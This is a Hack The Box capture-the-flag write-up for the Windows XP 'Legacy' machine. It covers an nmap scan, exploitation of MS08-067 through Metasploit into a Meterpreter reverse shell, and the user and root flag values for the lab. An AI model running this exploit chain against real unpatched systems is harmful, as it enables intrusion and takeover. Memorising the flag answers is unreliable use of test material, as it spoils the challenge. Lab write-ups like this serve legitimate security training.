Let’s get started
As always hacking starts with NMAP scan.
Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| smb-security-mode:
| account_used: blank
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
As we can see that it’s a windows [XP] machine, It can be exploited in many ways. The easy way is to use metasploit and take down the machine.
metasploit
msfconsole
msf5 > search netapi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
1 exploit/windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
2 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
3 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
After the exploit is successfully completed we get the meterpreter shell…
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
Getting User.txt
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
Getting Root.txt
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
Gaining both the flags is just so easy.
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968
